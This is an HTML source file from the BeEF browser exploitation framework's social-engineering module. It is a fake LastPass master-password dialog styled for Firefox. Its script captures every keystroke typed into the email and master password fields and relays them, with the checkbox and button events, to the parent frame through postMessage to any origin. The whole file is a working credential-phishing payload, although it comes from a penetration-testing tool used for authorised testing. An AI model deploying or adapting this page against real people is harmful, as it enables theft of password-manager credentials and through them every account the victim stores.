Files
beef/modules/social_engineering/fake_lastpass/indexFF.html
2013-07-21 13:53:44 +08:00

72 lines
3.2 KiB
HTML

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
<style type="text/css">
body { font-family: Helvetica,Arial;
color:-moz-DialogText;
background-color: #ededed;
font: message-box;
}
</style>
<script src="jquery.js" type="text/javascript"></script>
<script>
$(document).ready(function() {
$('#u').keyup(function() {
parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
});
$('#p').keyup(function() {
parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
});
$('#rememberemail').change(function() {
parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
});
$('#rememberpassword').change(function() {
parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
});
$('#showvault').change(function() {
parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
});
$('#disableffpwd').change(function() {
parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
});
$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
parent.postMessage('KILLFRAME','*');
});
});
</script>
</head><body>
<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
<form>
<div style="text-align: center">
<div style="text-align: left; padding-bottom:5px">Email</div>
<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
<div style="text-align: left; padding-bottom:5px">Master Password</div>
<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
</div>
<div style="text-align:center; padding-bottom:5px">
<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
</div>
<div style="text-align:right">
<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
</div>
</form>
</body></html>